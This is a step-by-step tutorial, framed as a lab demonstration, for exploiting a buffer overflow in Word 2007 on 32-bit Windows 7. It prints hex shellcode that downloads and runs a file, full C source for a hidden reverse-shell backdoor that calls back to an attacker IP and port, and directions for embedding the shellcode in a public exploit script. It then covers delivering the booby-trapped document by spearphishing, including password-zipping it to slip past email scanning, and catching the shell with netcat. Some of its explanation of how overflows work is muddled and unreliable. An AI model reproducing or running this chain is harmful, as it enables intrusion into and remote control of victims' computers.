Demonstrating Practical Buffer Overflows in Word 2007

Written: January 14, 2016

I am using OSX for my attacking box. From here I will run the exploit.

Update backdoor.c with your IP address and your port

This attack is against Word 2007 (SP0) on Windows 7 **(32 bit)**. I used a reasonably popular version of Windows, but I thought XP was too old, so you will need to compile IN windows. You can download a trial of Windows 7 from Microsoft, and I recommend you run it in Virtual Box as a VM.

For demonstration purposes, the victim’s box will also be considered as the lab that us, the attacker will build our payload in. It needs to be compiled in Windows to be executed on Windows.

Windows Prerequisites.

Within your Windows machine, you will need to install MinGW (compiler. This should be on your path, so best to put it in `C:\`, then add to your path `C:\MinGW\bin`. To test this worked, open a Command Prompt and type gcc. If you get an error that is related to “you need to specify a file to compile” then everything is working.

Once you are setup, ping the boxes from each other and make sure you have a connection between the two.

Generate the payload

Buffer overflow works when a specified buffer size is declared in lower level languages such as C. If the data to fill the buffer overflows the size of the buffer, then the processor will run the content outside the designated buffer. The processor is looking for a `x\00` as the end of the string — it called a Null Byte.

The following is the boiler plate payload. Its the hex data of the machine code that is to be run when the buffer in Word 2007 overflows.

33C9648B41308B400C8B7014AD96AD8B58108B533C03D38B527803D38B722003F333C941AD03C381384765745075F4817804726F634175EB8178086464726575E28B722403F3668B0C4E498B721C03F38B148E03D333C951682E65786568646561645352516861727941684C696272684C6F61645453FFD283C40C59505166B96C6C51686F6E2E646875726C6D54FFD083C4108B54240433C95166B965415133C9686F46696C686F616454686F776E6C6855524C445450FFD233C98D542424515152EB4751FFD083C41C33C95A5B5352516878656361884C24036857696E455453FFD26A058D4C241851FFD083C40C5A5B6865737361836C2403616850726F6368457869745453FFD2FFD0E8B4FFFFFF[HERE]

Notice at the end the `[HERE]`. This needs to be replaced. The code above goes to a URL and downloads the file at that URL, and then executes it. It is best to have your payload as small as possible as it is possible to run in to the stack of another process which would also crash the code. By downloading another program and executing it, it is now possible to run any program on the victim’s machine.

(Note, this is taken from packetstormsecurity.com. I have slightly modified it so that its easier to see what you need to change)

What is happening here, is the processor’s register is going to be filled with code that will actually execute, this code is then suffixed with a null byte so that the processor doesn’t continue into the next memory space and crash the code.

To generate the HEX for the URL that you want the above code to grab the exe from, use something like: http://www.rapidtables.com/convert/number/ascii-to-hex.htm

Enter the URL that you want, convert to hex, remove the spaces, and **add a 00 to the end**. Paste it at the end of the above string of hex instead of the `[HERE]`

Compile the executable backdoor

Next the arbitrary program needs to be hosted somewhere. This is the program that the above shell code will download and execute. For this example, A reverse backdoor will be run. The code for this is below:

#define _WIN32_WINNT 0x0500
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
//gcc backdoor.c -o backdoor -lws2_32
#pragma comment(lib,”ws2_32")
WSADATA wsaData;
SOCKET Winsock;
SOCKET Sock;
struct sockaddr_in hax;
char ip_addr[16];
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;
int main(int argc, char *argv[])
{
    HWND hWnd = GetConsoleWindow();
    ShowWindow( hWnd, SW_MINIMIZE ); //won’t hide the window without SW_MINIMIZE
    ShowWindow( hWnd, SW_HIDE );
    WSAStartup(MAKEWORD(2,2), &wsaData);
    Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
   struct hostent *host;
   host = gethostbyname(“172.16.0.66”);
   strcpy(ip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));
   hax.sin_family = AF_INET;
   hax.sin_port = htons(atoi(“4444”));
   hax.sin_addr.s_addr = inet_addr(ip_addr);
   WSAConnect(Winsock,(SOCKADDR*)&hax,sizeof(hax),NULL,NULL,NULL,NULL);
   memset(&ini_processo,0,sizeof(ini_processo));
   
   ini_processo.cb=sizeof(ini_processo);
   ini_processo.dwFlags=STARTF_USESTDHANDLES;
   ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;
    CreateProcess(NULL,”cmd.exe”,NULL,NULL,TRUE,0,NULL,NULL,&ini_processo,&processo_info);
}

In this file there are two things you need to replace, the IP address (172.16.0.66) and the Port (4444) of the attacker’s machine. This is where to call back to, to open the shell.

NOTE: This code is for Windows 32bit. This is stated above, but please don’t continue on 64 bit.

Compile the above code with `gcc backdoor.c -o bd -lws2_32`. You should end up with `bd.exe` if everything went well.

Now to generate the Word 2007 document that will be executed on the Victim’s machine

Serve your backdoor (I use SimpleHTTPServer). This needs to be hosted at the URL that you converted to hex earlier, for instance `http://172.16.0.66:8000/bd.exe`

Generate the vulnerable Word document

this is a well documented exploit, available [here](https://www.exploit-db.com/exploits/36207/) for download. Grab the python code and save it as exploit.py . If this ever goes offline, tweet me and I’ll dig it out for you.

The line that is of interest, is line 10:

shellcode = ‘31d2b230648b128b520c8b521

You need to replace the string of hex between the single quotes with your doctored HEX string that you generated earlier. Assuming on your attack box, you have Python installed (you should have python…) you can now run exploit.py [filename], where [filename] is the name of the word document you want to create (e.g bonuses.doc).

Malicious word-document

Spearphishing

The next thing is to conjure up how you are going to get the document to your victim.

• If you email it, you will need to zip it and password protect it as it may well get scanned and denied transfer.
• USB/file transfer work fine.
• I have no idea what anti virus sees when you run this.

Prepare for attack

Before the victim opens the word document, on the hacking box, open a listener with `nc -l [port number]`

Open the .doc on the victim and you have shell.

Got shell on the Windows machine